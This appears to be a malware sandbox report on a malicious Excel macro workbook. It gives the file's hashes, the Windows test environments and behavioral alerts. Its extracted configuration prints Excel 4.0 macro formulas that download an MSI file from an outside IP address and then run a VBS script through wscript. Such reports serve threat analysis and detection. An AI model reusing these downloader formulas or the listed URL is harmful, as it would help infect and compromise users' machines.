General
-
Target
07dedafd0fe71a813713ff615bae1f48
-
Size
6KB
-
Sample
231221-1q8qwshggk
-
MD5
07dedafd0fe71a813713ff615bae1f48
-
SHA1
7e3cca6c59a38c5d50d28bfaf02f45feae37260b
-
SHA256
0da5b46bf686558b3967dae7ffa2e6eb7795810815a0b155805716d771052140
-
SHA512
761a50ff2b17a2c2618589530d0b0f73ef442ff3b8160b69401b36eb636a501e44d2502913a4ac41491856c6b4ce8d6d02a4b1c880edc4595d5d2fb7fda7417e
-
SSDEEP
192:NDSJuSXbrA2OmmfRa8UhHFBFYuEb98ypkPk9z+3:NiuEM2wc1FY9b98ypkPk9M
Static task
static1
Behavioral task
behavioral1
Sample
07dedafd0fe71a813713ff615bae1f48.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
07dedafd0fe71a813713ff615bae1f48.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
07dedafd0fe71a813713ff615bae1f48
-
Size
6KB
-
MD5
07dedafd0fe71a813713ff615bae1f48
-
SHA1
7e3cca6c59a38c5d50d28bfaf02f45feae37260b
-
SHA256
0da5b46bf686558b3967dae7ffa2e6eb7795810815a0b155805716d771052140
-
SHA512
761a50ff2b17a2c2618589530d0b0f73ef442ff3b8160b69401b36eb636a501e44d2502913a4ac41491856c6b4ce8d6d02a4b1c880edc4595d5d2fb7fda7417e
-
SSDEEP
192:NDSJuSXbrA2OmmfRa8UhHFBFYuEb98ypkPk9z+3:NiuEM2wc1FY9b98ypkPk9M
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-